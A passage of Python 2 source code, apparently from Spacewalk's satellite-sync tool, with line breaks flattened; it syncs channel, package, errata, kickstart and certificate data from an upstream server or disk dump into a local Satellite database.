Error message: %s\n' % e) return 1 except (KeyboardInterrupt, SystemExit): raise except xmlWireSource.rpclib.xmlrpclib.Fault, e: log(-1, messages.failed_step % (step_name, e.faultString)) return 1 except Exception, e: # pylint: disable=E0012, W0703 log(-1, messages.failed_step % (step_name, e)) return 1 return ret def _step_arches(self): self.syncer.processArches() def _step_channel_families(self): self.syncer.processChannelFamilies() # Sync the certificate (and update channel family permissions) if not CFG.ISS_PARENT: self.syncer.syncCert() def _step_channels(self): try: self.syncer.process_channels() except MissingParentChannelError, e: msg = messages.parent_channel_error % repr(e.channel) log(-1, msg) # log2email(-1, msg) # redundant sendMail() return 1 def _step_short(self): try: return self.syncer.processShortPackages() except xmlDiskSource.MissingXmlDiskSourceFileError: msg = _("ERROR: The dump is missing package data, " + "use --no-rpms to skip this step or fix the content to include package data.") log2disk(-1, msg) log2stderr(-1, msg, cleanYN=1) sys.exit(25) def _step_download_packages(self): return self.syncer.download_package_metadata() def _step_download_source_packages(self): return self.syncer.download_source_package_metadata() def _step_rpms(self): self._packages_report = self.syncer.download_rpms() return None # def _step_srpms(self): # return self.syncer.download_srpms() def _step_download_errata(self): return self.syncer.download_errata() def _step_download_kickstarts(self): return self.syncer.download_kickstarts() def _step_packages(self): self._affected_channels = self.syncer.import_packages() # def _step_source_packages(self): # self.syncer.import_packages(sources=1) def _step_errata(self): self.syncer.import_errata() # Now that errata have been populated, schedule an errata cache # refresh schedule_errata_cache_update(self._affected_channels) def _step_kickstarts(self): self.syncer.import_kickstarts() def _step_orgs(self): try: self.syncer.import_orgs() except (RhnSyncException, xmlDiskSource.MissingXmlDiskSourceFileError, xmlDiskSource.MissingXmlDiskSourceDirError): # the orgs() method doesn't exist; that's fine we just # won't sync the orgs log(1, [_("The upstream Satellite does not support syncing orgs data."), _("Skipping...")]) def sendMail(forceEmail=0): """ Send email summary """ if forceEmail or (OPTIONS is not None and OPTIONS.email): body = dumpEMAIL_LOG() if body: print _("+++ sending log as an email +++") headers = { 'Subject': _('RHN Management Satellite sync. report from %s') % idn_pune_to_unicode(os.uname()[1]), } sndr = "root@%s" % idn_pune_to_unicode(os.uname()[1]) rhnMail.send(headers, body, sender=sndr) else: print _("+++ email requested, but there is nothing to send +++") # mail was sent. Let's not allow it to be sent twice... OPTIONS.email = None class Syncer: """ high-level sychronization/import class NOTE: there should *ONLY* be one instance of this. """ def __init__(self, channels, listChannelsYN, check_rpms, forceAllErrata=False): """ Base initialization. Most work done in self.initialize() which needs to be called soon after instantiation. """ self._requested_channels = channels self.mountpoint = OPTIONS.mount_point self.rhn_cert = OPTIONS.rhn_cert self.listChannelsYN = listChannelsYN self.forceAllErrata = forceAllErrata self.sslYN = not OPTIONS.no_ssl self._systemidPath = OPTIONS.systemid or _DEFAULT_SYSTEMID_PATH self._batch_size = OPTIONS.batch_size self.master_label = OPTIONS.master #self.create_orgs = OPTIONS.create_missing_orgs self.xml_dump_version = OPTIONS.dump_version or str(constants.PROTOCOL_VERSION) self.check_rpms = check_rpms self.keep_rpms = OPTIONS.keep_rpms # Object to help with channel math self._channel_req = None self._channel_collection = sync_handlers.ChannelCollection() self.containerHandler = sync_handlers.ContainerHandler( self.master_label) # instantiated in self.initialize() self.xmlDataServer = None self.systemid = None # self._*_full hold list of all ids for appropriate channel while # non-full self._* contain every id only once (in first channel it appeared) self._channel_packages = {} self._channel_packages_full = {} self._avail_channel_packages = {} self._missing_channel_packages = None self._missing_fs_packages = None self._failed_fs_packages = Queue.Queue() self._extinct_packages = Queue.Queue() self._channel_errata = {} self._missing_channel_errata = {} self._channel_source_packages = {} self._channel_source_packages_full = {} self._channel_kickstarts = {} self._avail_channel_source_packages = None self._missing_channel_src_packages = None self._missing_fs_source_packages = None def initialize(self): """Initialization that requires IO, etc.""" # Sync from filesystem: if self.mountpoint: log(1, [_(PRODUCT_NAME + ' - file-system synchronization'), ' mp: %s' % self.mountpoint]) self.xmlDataServer = xmlDiskSource.MetadataDiskSource(self.mountpoint) # Sync across the wire: else: self.xmlDataServer = xmlWireSource.MetadataWireSource(self.systemid, self.sslYN, self.xml_dump_version) if CFG.ISS_PARENT: sync_parent = CFG.ISS_PARENT self.systemid = 'N/A' # systemid is not used in ISS auth process is_iss = 1 elif not CFG.DISCONNECTED: sync_parent = CFG.RHN_PARENT is_iss = 0 else: log(1, _(PRODUCT_NAME + ' - live synchronization')) log(-1, _("ERROR: Can't use live synchronization in disconnected mode."), stream=sys.stderr) sys.exit(1) url = self.xmlDataServer.schemeAndUrl(sync_parent) log(1, [_(PRODUCT_NAME + ' - live synchronization'), _(' url: %s') % url, _(' debug/output level: %s') % CFG.DEBUG]) self.xmlDataServer.setServerHandler(isIss=is_iss) if not self.systemid: # check and fetch systemid (NOTE: systemid kept in memory... may or may not # be better to do it this way). if (os.path.exists(self._systemidPath) and os.access(self._systemidPath, os.R_OK)): self.systemid = open(self._systemidPath, 'rb').read() else: raise RhnSyncException, _('ERROR: this server must be registered with RHN.'), sys.exc_info()[2] # authorization check of the satellite auth = xmlWireSource.AuthWireSource(self.systemid, self.sslYN, self.xml_dump_version) auth.checkAuth() def __del__(self): self.containerHandler.close() def _process_simple(self, remote_function_name, step_name): """ Wrapper function that can process metadata that is relatively simple. This does the decoding of data (over the wire or from disk). step_name is just for pretty printing the actual --step name to the console. The remote function is passed by name (as a string), to mimic the lazy behaviour of the if block """ log(1, ["", _("Retrieving / parsing %s data") % step_name]) # get XML stream stream = None method = getattr(self.xmlDataServer, remote_function_name) stream = method() # parse/process XML stream try: self.containerHandler.process(stream) except KeyboardInterrupt: log(-1, _('*** SYSTEM INTERRUPT CALLED ***'), stream=sys.stderr) raise except (FatalParseException, ParseException, Exception), e: # pylint: disable=E0012, W0703 # nuke the container batch upon error! self.containerHandler.clear() msg = '' if isinstance(e, FatalParseException): msg = (_('ERROR: fatal parser exception occurred ') + _('(line: %s, col: %s msg: %s)') % ( e.getLineNumber(), e.getColumnNumber(), e._msg)) elif isinstance(e, ParseException): msg = (_('ERROR: parser exception occurred: %s') % (e)) elif isinstance(e, exceptions.SystemExit): log(-1, _('*** SYSTEM INTERRUPT CALLED ***'), stream=sys.stderr) raise else: msg = _('ERROR: exception (during parse) occurred: ') log2stderr(-1, _(' Encountered some errors with %s data ' + '(see logs (%s) for more information)') % (step_name, CFG.LOG_FILE)) log2(-1, 3, [_(' Encountered some errors with %s data:') % step_name, _(' ------- %s PARSE/IMPORT ERROR -------') % step_name, ' %s' % msg, _(' ---------------------------------------')], stream=sys.stderr) exitWithTraceback(e, '', 11) self.containerHandler.reset() log(1, _("%s data complete") % step_name) def processArches(self): self._process_simple("getArchesXmlStream", "arches") self._process_simple("getArchesExtraXmlStream", "additional arches") def import_orgs(self): self._process_simple("getOrgsXmlStream", "orgs") def syncCert(self): "sync the Red Hat Satellite cert if applicable (to local DB & filesystem)" store_cert = True if self.mountpoint: if self.rhn_cert: # Certificate was presented on the command line try: cert = open(self.rhn_cert).read() except IOError, e: raise RhnSyncException(_("Unable to open file %s: %s") % ( self.rhn_cert, e)), None, sys.exc_info()[2] cert = cert.strip() else: # Try to retrieve the certificate from the database row = satCerts.retrieve_db_cert() if row is None: raise RhnSyncException(_("No certificate found. " "Please use --rhn-cert")) cert = row['cert'] store_cert = False else: log2(1, 3, ["", _("RHN Entitlement Certificate sync")]) certSource = xmlWireSource.CertWireSource(self.systemid, self.sslYN, self.xml_dump_version) cert = certSource.download().strip() return self._process_cert(cert, store_cert) @staticmethod def _process_cert(cert, store_cert=1): """Give the cert a check - if it's broken xml we'd better find it out now """ log2(1, 4, _(" - parsing for sanity")) sat_cert = satellite_cert.SatelliteCert() try: sat_cert.load(cert) except satellite_cert.ParseException: # XXX figure out what to do raise RhnSyncException(_("Error parsing the satellite cert")), None, sys.exc_info()[2] # pylint: disable=E1101 # Compare certificate generation - should match the stream's generation = rhnFlags.get('stream-generation') if sat_cert.generation != generation: raise RhnSyncException(_("""\ Unable to import certificate: channel dump generation %s incompatible with cert generation %s. Please contact your RHN representative""") % (generation, sat_cert.generation)) satCerts.set_slots_from_cert(sat_cert, testonly=True) # push it into the database log2(1, 4, _(" - syncing to local database")) # possible place for bug 146395 # Populate channel family permissions sync_handlers.populate_channel_family_permissions(sat_cert) # Get rid of the extra channel families sync_handlers.purge_extra_channel_families() if store_cert: # store it! (does a commit) # XXX bug 146395 satCerts.storeRhnCert(cert) # Fix the channel family counts now sync_handlers.update_channel_family_counts() if store_cert: # save it to disk log2(1, 4, _(" - syncing to disk %s") % _DEFAULT_RHN_ENTITLEMENT_CERT_BACKUP) fileutils.rotateFile(_DEFAULT_RHN_ENTITLEMENT_CERT_BACKUP, depth=5) open(_DEFAULT_RHN_ENTITLEMENT_CERT_BACKUP, 'wb').write(cert) log2(1, 3, _("RHN Entitlement Certificate sync complete")) def processChannelFamilies(self): self._process_simple("getChannelFamilyXmlStream", "channel-families") # pylint: disable=W0703 try: self._process_simple("getProductNamesXmlStream", "product names") except Exception: pass def _process_comps(self, backend, label, timestamp): comps_path = 'rhn/comps/%s/comps-%s.xml' % (label, timestamp) full_path = os.path.join(CFG.MOUNT_POINT, comps_path) if not os.path.exists(full_path): if self.mountpoint or CFG.ISS_PARENT: stream = self.xmlDataServer.getComps(label) else: rpmServer = xmlWireSource.RPCGetWireSource(self.systemid, self.sslYN, self.xml_dump_version) stream = rpmServer.getCompsFileStream(label) f = FileManip(comps_path, timestamp, None) f.write_file(stream) data = {label: None} backend.lookupChannels(data) rhnSQL.Procedure('rhn_channel.set_comps')(data[label]['id'], comps_path, timestamp) def process_channels(self): """ push channels, channel-family and dist. map information as well upon parsing. """ log(1, ["", _("Retrieving / parsing channel data")]) h = sync_handlers.get_channel_handler() # get channel XML stream stream = self.xmlDataServer.getChannelXmlStream() if self.mountpoint: for substream in stream: h.process(substream) doEOSYN = 0 else: h.process(stream) doEOSYN = 1 h.close() # clean up the channel request and populate self._channel_request # This essentially determines which channels are to be imported self._compute_channel_request() # print out the relevant channel tree # 3/6/06 wregglej 183213 Don't print out the end-of-service message if # satellite-sync is running with the --mount-point (-m) option. If it # did, it would incorrectly list channels as end-of-service if they had been # synced already but aren't in the channel dump. self._printChannelTree(doEOSYN=doEOSYN) if self.listChannelsYN: # We're done here return requested_channels = self._channel_req.get_requested_channels() try: importer = sync_handlers.import_channels(requested_channels, orgid=OPTIONS.orgid or None, master=OPTIONS.master or None) for label in requested_channels: timestamp = self._channel_collection.get_channel_timestamp(label) ch = self._channel_collection.get_channel(label, timestamp) if ch.has_key('comps_last_modified') and ch['comps_last_modified'] is not None: self._process_comps(importer.backend, label, sync_handlers._to_timestamp(ch['comps_last_modified'])) except InvalidChannelFamilyError: raise RhnSyncException(messages.invalid_channel_family_error % ''.join(requested_channels)), None, sys.exc_info()[2] except MissingParentChannelError: raise rhnSQL.commit() log(1, _("Channel data complete")) @staticmethod def _formatChannelExportType(channel): """returns pretty formated text with type of channel export""" if 'export-type' not in channel or channel['export-type'] is None: return '' else: export_type = channel['export-type'] if 'export-start-date' in channel and channel['export-start-date'] is not None: start_date = channel['export-start-date'] else: start_date = '' if 'export-end-date' in channel and channel['export-end-date'] is not None: end_date = channel['export-end-date'] else: end_date = '' if end_date and not start_date: return _("%10s import from %s") % (export_type, formatDateTime(end_date)) elif end_date and start_date: return _("%10s import from %s - %s") % (export_type, formatDateTime(start_date), formatDateTime(end_date)) else: return _("%10s") % export_type def _printChannel(self, label, channel_object, log_format, is_imported): assert channel_object is not None all_pkgs = channel_object['all-packages'] or channel_object['packages'] pkgs_count = len(all_pkgs) if is_imported: status = _('p') else: status = _('.') log(1, log_format % (status, label, pkgs_count, self._formatChannelExportType(channel_object))) def _printChannelTree(self, doEOSYN=1, doTyposYN=1): "pretty prints a tree of channel information" log(1, _(' p = previously imported/synced channel')) log(1, _(' . = channel not yet imported/synced')) ch_end_of_service = self._channel_req.get_end_of_service() ch_typos = self._channel_req.get_typos() ch_requested_imported = self._channel_req.get_requested_imported() relevant = self._channel_req.get_requested_channels() if doEOSYN and ch_end_of_service: log(1, _(' e = channel no longer supported (end-of-service)')) if doTyposYN and ch_typos: log(1, _(' ? = channel label invalid --- typo?')) pc_labels = sorted(self._channel_collection.get_parent_channel_labels()) t_format = _(' %s:') p_format = _(' %s %-40s %4s %s') log(1, t_format % _('base-channels')) # Relevant parent channels no_base_channel = True for plabel in pc_labels: if plabel not in relevant: continue no_base_channel = False timestamp = self._channel_collection.get_channel_timestamp(plabel) channel_object = self._channel_collection.get_channel(plabel, timestamp) self._printChannel(plabel, channel_object, p_format, (plabel in ch_requested_imported)) if no_base_channel: log(1, p_format % (' ', _('NONE RELEVANT'), '', '')) # Relevant parent channels for plabel in pc_labels: cchannels = self._channel_collection.get_child_channels(plabel) # chns has only the channels we are interested in # (and that's all the channels if we list them) chns = [] for clabel, ctimestamp in cchannels: if clabel in relevant: chns.append((clabel, ctimestamp)) if not chns: # No child channels, skip continue log(1, t_format % plabel) for clabel, ctimestamp in sorted(chns): channel_object = self._channel_collection.get_channel(clabel, ctimestamp) self._printChannel(clabel, channel_object, p_format, (clabel in ch_requested_imported)) log(2, '') if doEOSYN and ch_end_of_service: log(1, t_format % _('end-of-service')) status = _('e') for chn in ch_end_of_service: log(1, p_format % (status, chn, '', '')) log(2, '') if doTyposYN and ch_typos: log(1, _(' typos:')) status = _('?') for chn in ch_typos: log(1, p_format % (status, chn, '', '')) log(2, '') log(1, '') def _compute_channel_request(self): """ channels request is verify and categorized. NOTE: self.channel_req *will be* initialized by this method """ # channels already imported, and all channels importedChannels = _getImportedChannels() availableChannels = self._channel_collection.get_channel_labels() log(6, _('XXX: imported channels: %s') % importedChannels, 1) log(6, _('XXX: cached channels: %s') % availableChannels, 1) # if requested a channel list, we are requesting all channels if self.listChannelsYN: requested_channels = availableChannels log(6, _('XXX: list channels called'), 1) else: requested_channels = self._requested_channels rc = req_channels.RequestedChannels(requested_channels) rc.set_available(availableChannels) rc.set_imported(importedChannels) # rc does all the logic of doing intersections and stuff rc.compute() typos = rc.get_typos() if typos: log(-1, _("ERROR: these channels either do not exist or " "are not available:")) for chn in typos: log(-1, " %s" % chn) log(-1, _(" (to see a list of channel labels: %s --list-channels)") % sys.argv[0]) sys.exit(12) self._channel_req = rc return rc def _get_channel_timestamp(self, channel): try: timestamp = self._channel_collection.get_channel_timestamp(channel) except KeyError: # XXX Do something with this exception raise return timestamp def _compute_unique_packages(self): """ process package metadata for one channel at a time """ relevant = sorted(self._channel_req.get_requested_channels()) self._channel_packages = {} self._channel_packages_full = {} self._avail_channel_packages = {} already_seen_ids = set() for chn in relevant: timestamp = self._get_channel_timestamp(chn) channel_obj = self._channel_collection.get_channel(chn, timestamp) avail_package_ids = sorted(set(channel_obj['packages'] or [])) package_full_ids = sorted(set(channel_obj['all-packages'] or [])) or avail_package_ids package_ids = sorted(set(package_full_ids) - already_seen_ids) self._channel_packages[chn] = package_ids self._channel_packages_full[chn] = package_full_ids self._avail_channel_packages[chn] = avail_package_ids already_seen_ids.update(package_ids) def processShortPackages(self): log(1, ["", "Retrieving short package metadata (used for indexing)"]) # Compute the unique packages and populate self._channel_packages self._compute_unique_packages() stream_loader = StreamProducer( sync_handlers.get_short_package_handler(), self.xmlDataServer, 'getChannelShortPackagesXmlStream') sorted_channels = sorted(self._channel_packages.items(), key=lambda x: x[0]) # sort by channel_label for channel_label, package_ids in sorted_channels: log(1, _(" Retrieving / parsing short package metadata: %s (%s)") % (channel_label, len(package_ids))) if package_ids: lm = self._channel_collection.get_channel_timestamp(channel_label) channel_last_modified = int(rhnLib.timestamp(lm)) stream_loader.set_args(channel_label, channel_last_modified) stream_loader.process(package_ids) stream_loader.close() self._diff_packages() _query_compare_packages = """ select p.id, c.checksum_type, c.checksum, p.path, p.package_size, TO_CHAR(p.last_modified, 'YYYYMMDDHH24MISS') last_modified from rhnPackage p, rhnChecksumView c where p.name_id = lookup_package_name(:name) and p.evr_id = lookup_evr(:epoch, :version, :release) and p.package_arch_id = lookup_package_arch(:arch) and (p.org_id = :org_id or (p.org_id is null and :org_id is null)) and p.checksum_id = c.id """ def _diff_packages_process(self, chunk, channel_label): package_collection = sync_handlers.ShortPackageCollection() h = rhnSQL.prepare(self._query_compare_packages) for pid in chunk: package = package_collection.get_package(pid) assert package is not None l_timestamp = rhnLib.timestamp(package['last_modified']) if package['org_id'] is not None: package['org_id'] = OPTIONS.orgid or DEFAULT_ORG nevra = get_nevra_dict(package) nevra['org_id'] = package['org_id'] h.execute(**nevra) row = None for r in (h.fetchall_dict() or []): # let's check which checksum we have in database if (r['checksum_type'] in package['checksums'] and package['checksums'][r['checksum_type']] == r['checksum']): row = r break self._process_package(pid, package, l_timestamp, row, self._missing_channel_packages[channel_label], self._missing_fs_packages[channel_label], check_rpms=self.check_rpms) # XXX the "is null" condition will have to change in multiorg satellites def _diff_packages(self): self._missing_channel_packages = {} self._missing_fs_packages = {} sorted_channels = sorted(self._channel_packages.items(), key=lambda x: x[0]) # sort by channel_label for channel_label, upids in sorted_channels: log(1, _("Diffing package metadata (what's missing locally?): %s") % channel_label) self._missing_channel_packages[channel_label] = [] self._missing_fs_packages[channel_label] = [] self._proces_batch(channel_label, upids[:], None, self._diff_packages_process, _('Diffing: '), [channel_label]) self._verify_missing_channel_packages(self._missing_channel_packages) def _verify_missing_channel_packages(self, missing_channel_packages, sources=0): """Verify if all the missing packages are actually available somehow. In an incremental approach, one may request packages that are actually not available in the current dump, probably because of applying an incremental to the wrong base""" for channel_label, pids in missing_channel_packages.items(): if sources: avail_pids = [x[0] for x in self._avail_channel_source_packages[channel_label]] else: avail_pids = self._avail_channel_packages[channel_label] if set(pids or []) > set(avail_pids or []): raise RhnSyncException, _('ERROR: incremental dump skipped') @staticmethod def _get_rel_package_path(nevra, org_id, source, checksum_type, checksum): return get_package_path(nevra, org_id, prepend=CFG.PREPENDED_DIR, source=source, checksum_type=checksum_type, checksum=checksum) @staticmethod def _verify_file(path, mtime, size, checksum_type, checksum): """ Verifies if the file is on the filesystem and matches the mtime and checksum. Computing the checksum is costly, that's why we rely on mtime comparisons. Returns errcode: 0 - file is ok, it has either the specified mtime and size or checksum matches (then function sets mtime) 1 - file does not exist at all 2 - file has a different checksum """ if not path: return 1 abs_path = os.path.join(CFG.MOUNT_POINT, path) try: stat_info = os.stat(abs_path) except OSError: # File is missing completely return 1 l_mtime = stat_info[stat.ST_MTIME] l_size = stat_info[stat.ST_SIZE] if l_mtime == mtime and l_size == size: # Same mtime, and size, assume identity return 0 # Have to check checksum l_checksum = getFileChecksum(checksum_type, filename=abs_path) if l_checksum != checksum: return 2 # Set the mtime os.utime(abs_path, (mtime, mtime)) return 0 def _process_package(self, package_id, package, l_timestamp, row, m_channel_packages, m_fs_packages, check_rpms=1): path = None channel_package = None fs_package = None if row: # package found in the DB checksum_type = row['checksum_type'] if checksum_type in package['checksums']: checksum = package['checksums'][row['checksum_type']] package_size = package['package_size'] db_timestamp = int(rhnLib.timestamp(row['last_modified'])) db_checksum = row['checksum'] db_package_size = row['package_size'] db_path = row['path'] if not (l_timestamp <= db_timestamp and checksum == db_checksum and package_size == db_package_size): # package doesn't match channel_package = package_id if check_rpms: if db_path: # check the filesystem errcode = self._verify_file(db_path, l_timestamp, package_size, checksum_type, checksum) if errcode: # file doesn't match fs_package = package_id channel_package = package_id path = db_path else: # upload package and reimport metadata channel_package = package_id fs_package = package_id else: # package is missing from the DB channel_package = package_id fs_package = package_id if channel_package: m_channel_packages.append(channel_package) if fs_package: m_fs_packages.append((fs_package, path)) return def download_rpms(self): log(1, ["", _("Downloading rpm packages")]) # Lets go fetch the packages and push them to their proper location: sorted_channels = sorted(self._missing_fs_packages.items(), key=lambda x: x[0]) # sort by channel for channel, missing_fs_packages in sorted_channels: missing_packages_count = len(missing_fs_packages) log(1, _(" Fetching any missing RPMs: %s (%s)") % (channel, missing_packages_count or _('NONE MISSING'))) if missing_packages_count == 0: continue # Fetch all RPMs whose meta-data is marked for need to be imported # (ie. high chance of not being there) self._fetch_packages(channel, missing_fs_packages) continue log(1, _("Processing rpm packages complete")) def _missing_not_cached_packages(self): missing_packages = {} # First, determine what has to be downloaded short_package_collection = sync_handlers.ShortPackageCollection() package_collection = sync_handlers.PackageCollection() for channel, pids in self._missing_channel_packages.items(): missing_packages[channel] = mp = [] if not pids: # Nothing to see here continue for pid in pids: # XXX Catch errors if (not package_collection.has_package(pid) or package_collection.get_package(pid)['last_modified'] != short_package_collection.get_package(pid)['last_modified']): # not in the cache mp.append(pid) return missing_packages def download_package_metadata(self): log(1, ["", _("Downloading package metadata")]) # Get the missing but uncached packages missing_packages = self._missing_not_cached_packages() stream_loader = StreamProducer( sync_handlers.get_package_handler(), self.xmlDataServer, 'getPackageXmlStream') sorted_channels = sorted(missing_packages.items(), key=lambda x: x[0]) # sort by channel for channel, pids in sorted_channels: self._proces_batch(channel, pids[:], messages.package_parsing, stream_loader.process, is_slow=True) stream_loader.close() # Double-check that we got all the packages missing_packages = self._missing_not_cached_packages() for channel, pids in missing_packages.items(): if pids: # Something may have changed from the moment we started to # download the packages till now raise ReprocessingNeeded def download_srpms(self): self._compute_unique_source_packages() self._diff_source_packages() log(1, ["", _("Downloading srpm packages")]) # Lets go fetch the source packages and push them to their proper location: sorted_channels = sorted(self._missing_fs_source_packages.items(), key=lambda x: x[0]) # sort by channel_label for channel, missing_fs_source_packages in sorted_channels: missing_source_packages_count = len(missing_fs_source_packages) log(1, _(" Fetching any missing SRPMs: %s (%s)") % (channel, missing_source_packages_count or _('NONE MISSING'))) if missing_source_packages_count == 0: continue # Fetch all SRPMs whose meta-data is marked for need to be imported # (ie. high chance of not being there) self._fetch_packages(channel, missing_fs_source_packages, sources=1) continue log(1, "Processing srpm packages complete") def _compute_unique_source_packages(self): """ process package metadata for one channel at a time""" relevant = self._channel_req.get_requested_channels() self._channel_source_packages = {} self._channel_source_packages_full = {} self._avail_channel_source_packages = {} already_seen_ids = set() for chn in relevant: timestamp = self._get_channel_timestamp(chn) channel_obj = self._channel_collection.get_channel(chn, timestamp) sps = set(channel_obj['source_packages']) if not sps: # No source package info continue ret_sps = [] for sp in sps: if isinstance(sp, types.StringType): # Old style ret_sps.append((sp, None)) else: ret_sps.append((sp['id'], sp['last_modified'])) del sps ret_sps.sort() self._channel_source_packages[chn] = sorted(set(ret_sps) - already_seen_ids) self._channel_source_packages_full[chn] = ret_sps self._avail_channel_source_packages[chn] = ret_sps already_seen_ids.update(ret_sps) def _compute_not_cached_source_packages(self): missing_sps = {} # First, determine what has to be downloaded sp_collection = sync_handlers.SourcePackageCollection() for channel, sps in self._channel_source_packages.items(): missing_sps[channel] = [] if not sps: # Nothing to see here continue missing_sps[channel] = [sp_id for (sp_id, _timestamp) in sps if not sp_collection.has_package(sp_id)] return missing_sps _query_compare_source_packages = """ select ps.id, c.checksum_type, c.checksum, ps.path, ps.package_size, TO_CHAR(ps.last_modified, 'YYYYMMDDHH24MISS') last_modified from rhnPackageSource ps, rhnChecksumView c where ps.source_rpm_id = lookup_source_name(:package_id) and (ps.org_id = :org_id or (ps.org_id is null and :org_id is null)) and ps.checksum_id = c.id and c.checksum = :checksum and c.checksum_type = :checksum_type """ def _diff_source_packages_process(self, chunk, channel_label): package_collection = sync_handlers.SourcePackageCollection() sql_params = ['package_id', 'checksum', 'checksum_type'] h = rhnSQL.prepare(self._query_compare_source_packages) for pid, _timestamp in chunk: package = package_collection.get_package(pid) assert package is not None params = {} for t in sql_params: params[t] = package[t] or "" if package['org_id'] is not None: params['org_id'] = OPTIONS.orgid or DEFAULT_ORG package['org_id'] = OPTIONS.orgid or DEFAULT_ORG else: params['org_id'] = package['org_id'] h.execute(**params) row = h.fetchone_dict() self._process_package(pid, package, None, row, self._missing_channel_src_packages[channel_label], self._missing_fs_source_packages[channel_label]) # XXX the "is null" condition will have to change in multiorg satellites def _diff_source_packages(self): self._missing_channel_src_packages = {} self._missing_fs_source_packages = {} for channel_label, upids in self._channel_source_packages.items(): log(1, _("Diffing source package metadata (what's missing locally?): %s") % channel_label) self._missing_channel_src_packages[channel_label] = [] self._missing_fs_source_packages[channel_label] = [] self._proces_batch(channel_label, upids[:], None, self._diff_source_packages_process, _('Diffing: '), [channel_label]) self._verify_missing_channel_packages(self._missing_channel_src_packages, sources=1) def download_source_package_metadata(self): log(1, ["", _("Downloading source package metadata")]) # Get the missing but uncached packages missing_packages = self._compute_not_cached_source_packages() stream_loader = StreamProducer( sync_handlers.get_source_package_handler(), self.xmlDataServer, 'getSourcePackageXmlStream') for channel, pids in missing_packages.items(): self._proces_batch(channel, pids[:], messages.package_parsing, stream_loader.process, is_slow=True) stream_loader.close() # Double-check that we got all the packages missing_packages = self._compute_not_cached_source_packages() for channel, pids in missing_packages.items(): if pids: # Something may have changed from the moment we started to # download the packages till now raise ReprocessingNeeded def _compute_unique_kickstarts(self): """ process package metadata for one channel at a time""" relevant = self._channel_req.get_requested_channels() self._channel_kickstarts = {} already_seen_kickstarts = set() for chn in relevant: timestamp = self._get_channel_timestamp(chn) channel_obj = self._channel_collection.get_channel(chn, timestamp) self._channel_kickstarts[chn] = \ sorted(set(channel_obj['kickstartable_trees']) - already_seen_kickstarts) already_seen_kickstarts.update(self._channel_kickstarts[chn]) def _compute_missing_kickstarts(self): """ process package metadata for one channel at a time""" relevant = self._channel_req.get_requested_channels() coll = sync_handlers.KickstartableTreesCollection() missing_kickstarts = {} for chn in relevant: timestamp = self._get_channel_timestamp(chn) channel_obj = self._channel_collection.get_channel(chn, timestamp) kickstart_trees = channel_obj['kickstartable_trees'] for ktid in kickstart_trees: # No timestamp for kickstartable trees kt = coll.get_item(ktid, timestamp=None) assert kt is not None kt_label = kt['label'] # XXX rhnKickstartableTree does not have a last_modified # Once we add it, we should be able to do more meaningful # diffs missing_kickstarts[kt_label] = None ret = missing_kickstarts.items() ret.sort() return ret def _download_kickstarts_file(self, chunk, channel_label): cfg = config.initUp2dateConfig() assert len(chunk) == 1 item = chunk[0] label, base_path, relative_path, timestamp, file_size = item path = os.path.join(base_path, relative_path) f = FileManip(path, timestamp=timestamp, file_size=file_size) # Retry a number of times, we may have network errors for _try in range(cfg['networkRetries']): stream = self._get_ks_file_stream(channel_label, label, relative_path) try: f.write_file(stream) break # inner for except FileCreationError, e: msg = e.args[0] log2disk(-1, _("Unable to save file %s: %s") % (path, msg)) # Try again continue else: # for # Retried a number of times and it still failed; log the # file as being failed and move on log2disk(-1, _("Failed to fetch file %s") % path) def download_kickstarts(self): """Downloads all the kickstart-related information""" log(1, ["", _("Downloading kickstartable trees metadata")]) self._compute_unique_kickstarts() stream_loader = StreamProducer( sync_handlers.get_kickstarts_handler(), self.xmlDataServer, 'getKickstartsXmlStream') for channel, ktids in self._channel_kickstarts.items(): self._proces_batch(channel, ktids[:], messages.kickstart_parsing, stream_loader.process) stream_loader.close() missing_ks_files = self._compute_missing_ks_files() log(1, ["", _("Downloading kickstartable trees files")]) sorted_channels = sorted(missing_ks_files.items(), key=lambda x: x[0]) # sort by channel for channel, files in sorted_channels: self._proces_batch(channel, files[:], messages.kickstart_downloading, self._download_kickstarts_file, nevermorethan=1, process_function_args=[channel]) def _get_ks_file_stream(self, channel, kstree_label, relative_path): if self.mountpoint: s = xmlDiskSource.KickstartFileDiskSource(self.mountpoint) s.setID(kstree_label) s.set_relative_path(relative_path) return s.load() if CFG.ISS_PARENT: return self.xmlDataServer.getKickstartFile(kstree_label, relative_path) else: srv = xmlWireSource.RPCGetWireSource(self.systemid, self.sslYN, self.xml_dump_version) return srv.getKickstartFileStream(channel, kstree_label, relative_path) def _compute_missing_ks_files(self): coll = sync_handlers.KickstartableTreesCollection() missing_ks_files = {} # download files for the ks trees for channel, ktids in self._channel_kickstarts.items(): missing_ks_files[channel] = missing = [] for ktid in ktids: # No timestamp for kickstartable trees kt = coll.get_item(ktid, timestamp=None) assert kt is not None kt_label = kt['label'] base_path = kt['base_path'] files = kt['files'] for f in files: relative_path = f['relative_path'] dest_path = os.path.join(base_path, relative_path) timestamp = rhnLib.timestamp(f['last_modified']) file_size = f['file_size'] errcode = self._verify_file(dest_path, timestamp, file_size, f['checksum_type'], f['checksum']) if errcode != 0: # Have to download it val = (kt_label, base_path, relative_path, timestamp, file_size) missing.append(val) return missing_ks_files def import_kickstarts(self): """Imports the kickstart-related information""" missing_kickstarts = self._compute_missing_kickstarts() if not missing_kickstarts: log(1, messages.kickstart_import_nothing_to_do) return ks_count = len(missing_kickstarts) log(1, messages.kickstart_importing % ks_count) coll = sync_handlers.KickstartableTreesCollection() batch = [] for ks, timestamp in missing_kickstarts: ksobj = coll.get_item(ks, timestamp=timestamp) assert ksobj is not None if ksobj['org_id'] is not None: ksobj['org_id'] = OPTIONS.orgid or DEFAULT_ORG batch.append(ksobj) _importer = sync_handlers.import_kickstarts(batch) log(1, messages.kickstart_imported % ks_count) def _compute_not_cached_errata(self): missing_errata = {} # First, determine what has to be downloaded errata_collection = sync_handlers.ErrataCollection() for channel, errata in self._channel_errata.items(): missing_errata[channel] = [] if not errata: # Nothing to see here continue missing_errata[channel] = [eid for (eid, timestamp, _advisory_name) in errata if not errata_collection.has_erratum(eid, timestamp) or self.forceAllErrata] return missing_errata _query_get_db_errata = rhnSQL.Statement(""" select e.id, e.advisory_name, TO_CHAR(e.last_modified, 'YYYYMMDDHH24MISS') last_modified from rhnChannelErrata ce, rhnErrata e, rhnChannel c where c.label = :channel and ce.channel_id = c.id and ce.errata_id = e.id """) def _get_db_channel_errata(self): """ Fetch the errata stored in the local satellite's database. Returned as a hash of channel to another hash of advisory names to a tuple of errata id and last modified date. """ db_channel_errata = {} relevant = self._channel_req.get_requested_channels() h = 